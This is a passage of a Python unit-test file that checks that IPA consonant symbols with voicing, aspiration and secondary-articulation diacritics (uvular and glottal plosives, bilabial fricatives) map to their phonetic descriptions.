# voiced aspirated palatalized uvular plosive pulmonic egressive consonant
def test_ɢʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰʲ")
self.assertEqual(actual, expected)
def test_q̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular plosive pulmonic egressive consonant
def test_ɢʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰˠ")
self.assertEqual(actual, expected)
def test_q̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant
def test_ɢʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰˤ")
self.assertEqual(actual, expected)
def test_q̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰˤ")
self.assertEqual(actual, expected)
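    # q and ɢ form a voiceless/voiced pair, so in the cases above each
    # description is reachable two ways: from the letter whose voicing
    # already matches, or from the opposite letter plus a voicing diacritic.
    # A hedged sketch of that symmetry, using only equalities that follow
    # from the expected strings asserted above:
    def test_uvular_plosive_voicing_pair_symmetry(self):
        # Both spellings of the voiced uvular plosive agree...
        self.assertEqual(describe_transcription("ɢ"), describe_transcription("q̬"))
        # ...and both spellings of the voiceless one agree as well.
        self.assertEqual(describe_transcription("q"), describe_transcription("ɢ̥"))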
# voiceless glottal plosive pulmonic egressive consonant
def test_ʔ_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ")
self.assertEqual(actual, expected)
def test_ʔ̊_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊")
self.assertEqual(actual, expected)
def test_ʔ̥_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥")
self.assertEqual(actual, expected)
# voiceless labialized glottal plosive pulmonic egressive consonant
def test_ʔʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʷ")
self.assertEqual(actual, expected)
def test_ʔ̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ʷ")
self.assertEqual(actual, expected)
def test_ʔ̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized glottal plosive pulmonic egressive consonant
def test_ʔʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʲ")
self.assertEqual(actual, expected)
def test_ʔ̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ʲ")
self.assertEqual(actual, expected)
def test_ʔ̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized glottal plosive pulmonic egressive consonant
def test_ʔˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔˠ")
self.assertEqual(actual, expected)
def test_ʔ̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ˠ")
self.assertEqual(actual, expected)
def test_ʔ̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔˤ")
self.assertEqual(actual, expected)
def test_ʔ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊ˤ")
self.assertEqual(actual, expected)
def test_ʔ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated glottal plosive pulmonic egressive consonant
def test_ʔʰ_is_the_representation_of_the_voiceless_aspirated_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized glottal plosive pulmonic egressive consonant
def test_ʔʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized glottal plosive pulmonic egressive consonant
def test_ʔʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized glottal plosive pulmonic egressive consonant
def test_ʔʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʰˤ")
self.assertEqual(actual, expected)
# voiced glottal plosive pulmonic egressive consonant
def test_ʔ̬_is_the_representation_of_the_voiced_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬")
self.assertEqual(actual, expected)
# voiced labialized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized glottal plosive pulmonic egressive consonant
def test_ʔ̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized glottal plosive pulmonic egressive consonant
def test_ʔ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̬ʰˤ")
self.assertEqual(actual, expected)
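    # The glottal cases rely on combining diacritics (ring below U+0325 and
    # ring above U+030A for voiceless, caron below U+032C for voiced) that
    # are easy to confuse in an editor. A hedged sketch using explicit
    # escapes to pin down exactly which codepoints the cases above exercise:
    def test_glottal_plosive_voicing_diacritics_by_codepoint(self):
        glottal_stop = "\u0294"  # ʔ
        for diacritic in ("\u0325", "\u030A"):  # ring below, ring above
            with self.subTest(diacritic=hex(ord(diacritic))):
                self.assertEqual(
                    describe_transcription(glottal_stop + diacritic),
                    "voiceless glottal plosive pulmonic egressive consonant",
                )
        self.assertEqual(
            describe_transcription(glottal_stop + "\u032C"),  # caron below
            "voiced glottal plosive pulmonic egressive consonant",
        )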
# voiceless bilabial fricative pulmonic egressive consonant
def test_ɸ_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ")
self.assertEqual(actual, expected)
def test_ɸ̊_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊")
self.assertEqual(actual, expected)
def test_ɸ̥_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥")
self.assertEqual(actual, expected)
def test_β̊_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊")
self.assertEqual(actual, expected)
def test_β̥_is_the_representation_of_the_voiceless_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial fricative pulmonic egressive consonant
def test_ɸʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʷ")
self.assertEqual(actual, expected)
def test_ɸ̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ʷ")
self.assertEqual(actual, expected)
def test_ɸ̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ʷ")
self.assertEqual(actual, expected)
def test_β̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʷ")
self.assertEqual(actual, expected)
def test_β̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial fricative pulmonic egressive consonant
def test_ɸʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʲ")
self.assertEqual(actual, expected)
def test_ɸ̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ʲ")
self.assertEqual(actual, expected)
def test_ɸ̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ʲ")
self.assertEqual(actual, expected)
def test_β̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʲ")
self.assertEqual(actual, expected)
def test_β̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial fricative pulmonic egressive consonant
def test_ɸˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸˠ")
self.assertEqual(actual, expected)
def test_ɸ̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ˠ")
self.assertEqual(actual, expected)
def test_ɸ̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ˠ")
self.assertEqual(actual, expected)
def test_β̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ˠ")
self.assertEqual(actual, expected)
def test_β̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial fricative pulmonic egressive consonant
def test_ɸˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸˤ")
self.assertEqual(actual, expected)
def test_ɸ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̊ˤ")
self.assertEqual(actual, expected)
def test_ɸ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̥ˤ")
self.assertEqual(actual, expected)
def test_β̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ˤ")
self.assertEqual(actual, expected)
def test_β̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial fricative pulmonic egressive consonant
def test_ɸʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰ")
self.assertEqual(actual, expected)
def test_β̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰ")
self.assertEqual(actual, expected)
def test_β̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial fricative pulmonic egressive consonant
def test_ɸʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰʷ")
self.assertEqual(actual, expected)
def test_β̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰʷ")
self.assertEqual(actual, expected)
def test_β̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant
def test_ɸʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰʲ")
self.assertEqual(actual, expected)
def test_β̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰʲ")
self.assertEqual(actual, expected)
def test_β̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial fricative pulmonic egressive consonant
def test_ɸʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰˠ")
self.assertEqual(actual, expected)
def test_β̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰˠ")
self.assertEqual(actual, expected)
def test_β̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant
def test_ɸʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸʰˤ")
self.assertEqual(actual, expected)
def test_β̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̥ʰˤ")
self.assertEqual(actual, expected)
def test_β̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̊ʰˤ")
self.assertEqual(actual, expected)
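    # In the aspirated cases above the modifier order is fixed: aspiration ʰ
    # precedes the secondary-articulation letter (ʷ ʲ ˠ ˤ), and the prose
    # mirrors it as "<voicing> aspirated <secondary> <place> <manner>
    # pulmonic egressive consonant". A hedged sketch of that composition,
    # restricted to the ɸ cases already asserted above:
    def test_bilabial_fricative_modifier_ordering(self):
        secondary = {
            "ʷ": "labialized",
            "ʲ": "palatalized",
            "ˠ": "velarized",
            "ˤ": "pharyngealized",
        }
        for letter, label in secondary.items():
            with self.subTest(secondary=label):
                self.assertEqual(
                    describe_transcription("ɸʰ" + letter),
                    f"voiceless aspirated {label} bilabial fricative pulmonic egressive consonant",
                )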
# voiced bilabial fricative pulmonic egressive consonant
def test_β_is_the_representation_of_the_voiced_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β")
self.assertEqual(actual, expected)
def test_ɸ̬_is_the_representation_of_the_voiced_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬")
self.assertEqual(actual, expected)
# voiced labialized bilabial fricative pulmonic egressive consonant
def test_βʷ_is_the_representation_of_the_voiced_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʷ")
self.assertEqual(actual, expected)
def test_ɸ̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial fricative pulmonic egressive consonant
def test_βʲ_is_the_representation_of_the_voiced_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʲ")
self.assertEqual(actual, expected)
def test_ɸ̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial fricative pulmonic egressive consonant
def test_βˠ_is_the_representation_of_the_voiced_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βˠ")
self.assertEqual(actual, expected)
def test_ɸ̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial fricative pulmonic egressive consonant
def test_βˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βˤ")
self.assertEqual(actual, expected)
def test_ɸ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial fricative pulmonic egressive consonant
def test_βʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰ")
self.assertEqual(actual, expected)
def test_β̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial fricative pulmonic egressive consonant
def test_βʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰʷ")
self.assertEqual(actual, expected)
def test_β̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial fricative pulmonic egressive consonant
def test_βʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰʲ")
self.assertEqual(actual, expected)
def test_β̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial fricative pulmonic egressive consonant
def test_βʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰˠ")
self.assertEqual(actual, expected)
def test_β̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant
